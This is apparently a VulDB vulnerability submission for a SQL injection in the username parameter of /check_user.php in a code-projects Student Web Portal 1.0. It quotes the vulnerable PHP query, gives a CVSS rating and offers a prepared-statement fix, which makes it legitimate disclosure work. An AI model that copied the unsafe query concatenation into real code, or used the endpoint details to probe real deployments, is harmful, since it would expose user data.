Submeter #748816: code-projects.org STUDENT WEB PORTAL IN PHP WITH SOURCE CODE 1.0 SQL Injectioninformação

Título	code-projects.org STUDENT WEB PORTAL IN PHP WITH SOURCE CODE 1.0 SQL Injection
Descrição	STUDENT WEB PORTAL IN PHP WITH SOURCE CODE SQL-INJECT Student Web Portal In PHP With Source Code - Source Code & Projects Summary Student Web Portal In PHP With Source Code - Source Code & Projects contains a SQL Injection vulnerability in due to unsafe string concatenation of user-controlled input into an SQL query. An unauthenticated remote attacker can supply a crafted parameter to manipulate the database query logic, potentially enabling data disclosure and other impacts depending on database privileges and deployment configuration.check_user.phpusername Vulnerability Details Vulnerability Class: SQL Injection CWE: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command) Affected Endpoint: /check_user.php?username=... Affected Parameter: (HTTP GET)username Affected Component/File: check_user.php Database/API: MySQL via mysqli Vulnerable Code (excerpt): $query = "select * from user where user_name='".$_GET['username']."'"; $table = mysqli_query($connection, $query); Root Cause User input from is directly concatenated into an SQL statement without parameterization, allowing an attacker to inject SQL syntax and alter query semantics.$_GET['username'] Impact Depending on the environment and database permissions, exploitation may allow: Manipulation of the username-existence check logic (inconsistent “already exist” vs “available” results) Blind SQL Injection (boolean/time-based) to infer database contents even when errors are suppressed Potential sensitive data disclosure if the database account has broader read access The exact impact depends on DB privileges, MySQL configuration (e.g., multi-statement settings), application behavior, and any upstream security controls. Severity / CVSS Recommended CVSS v3.1 Base Score: 7.5 (High) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Rationale: Remote, low complexity, no authentication, no user interaction; primary risk is confidentiality. Remediation Primary Fix: Use prepared statements (parameterized queries) and reduce query scope. Secure Patch Example (mysqli prepared statement): <?php error_reporting(0); include 'config.php'; if (isset($_GET['username'])) { $username = $_GET['username']; $stmt = mysqli_prepare($connection, "SELECT 1 FROM user WHERE user_name = ? LIMIT 1"); if ($stmt) { mysqli_stmt_bind_param($stmt, "s", $username); mysqli_stmt_execute($stmt); mysqli_stmt_store_result($stmt); if (mysqli_stmt_num_rows($stmt) === 1) { echo "Username already exist."; } else { echo "Username Available"; } mysqli_stmt_close($stmt); } } ?>
Fonte	⚠️ https://github.com/Qing-420/cve/blob/main/sql.md
Utilizador	TrySec (UID 94998)
Submissão	29/01/2026 12h27 (há 3 meses)
Moderação	07/02/2026 09h50 (9 days later)
Estado	Aceite
Entrada VulDB	344860 [code-projects Student Web Portal 1.0 /check_user.php Nome de utilizador Injeção SQL]
Pontos	20

◂ Voltar Visão Geral Próximo ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!